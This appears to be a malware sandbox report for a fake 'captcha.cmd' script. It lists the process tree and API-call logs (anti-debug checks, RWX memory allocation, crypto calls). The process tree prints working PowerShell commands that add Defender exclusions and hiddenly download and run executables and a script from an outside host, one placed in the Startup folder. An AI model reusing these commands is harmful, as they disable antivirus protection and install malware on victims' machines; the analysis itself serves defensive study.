Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 29, 2024, 5:08 p.m.	Oct. 29, 2024, 5:10 p.m.

Size	4.3KB
Type	ASCII text, with CRLF line terminators
MD5	`3d100d4d3fe69b9740cecb0766794b81`
SHA256	`b5fa8aa1395fd7cc8023279bb7ef6ac1cbe8913d9fc69beab1152a38969fa469`
CRC32	`5845D5BC`
ssdeep	`96:A7+5CxllLuErRSzz1sOzwy6J5OAnCgXZH5TtJH:AaCxbDYtzOuAn/ZdH`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IWzFgieEMMVP" C:\Users\test22\AppData\Local\Temp\captcha.cmd
1440
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\captcha.cmd
  1028
  - powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\test22\AppData\Local\Temp\captcha.cmd'))"
    2144
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
      2272
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
      2396
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
      2444
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
      2504
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
      2564
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
      2640
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
      2736
      - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1
        2872
    - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
      2888

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 58 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 29, 2024, 5:08 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (10 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0
IsDebuggerPresent Oct. 29, 2024, 5:08 p.m.			0	0

Command line console output was observed (50 out of 159 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: Echo console_handle: 0x00000007	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: Please wait... console_handle: 0x00000007	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: Please wait... console_handle: 0x00000007	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + Add-MpPreference <<<< -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-M console_handle: 0x00000053	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: pPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath ' console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: C:/Windows' console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000077	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: mmandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x000000af	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: At line:1 char:83 console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPrefe console_handle: 0x000000df	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: rence <<<< -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath ' console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: C:/Windows' console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x00000103	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: mmandNotFoundException console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x0000013b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x00000147	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x00000153	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: At line:1 char:134 console_handle: 0x0000015f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPrefe console_handle: 0x0000016b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: rence -ExclusionPath 'C:\Users\test22'; Add-MpPreference <<<< -ExclusionPath ' console_handle: 0x00000177	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: C:/Windows' console_handle: 0x00000183	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000018f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: mmandNotFoundException console_handle: 0x0000019b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000001a7	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: At line:1 char:18 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + Invoke-WebRequest <<<< -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\t console_handle: 0x00000053	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: est22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe' console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: ommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: nnot find the file specified. console_handle: 0x000000af	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: At line:1 char:102 console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\ console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: qdll.exe'; Start-Process <<<< -FilePath 'C:\Users\test22\qdll.exe' console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 29, 2024, 5:08 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x000000df	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 452 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcdd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dc710 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dcf10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd2d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dd2d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05e80aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05e80aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00698bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006981f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006981f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006981f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00697eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00697eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00697eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 29, 2024, 5:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00697eb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 29, 2024, 5:08 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1267 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0241a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02871000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 29, 2024, 5:08 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0248a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
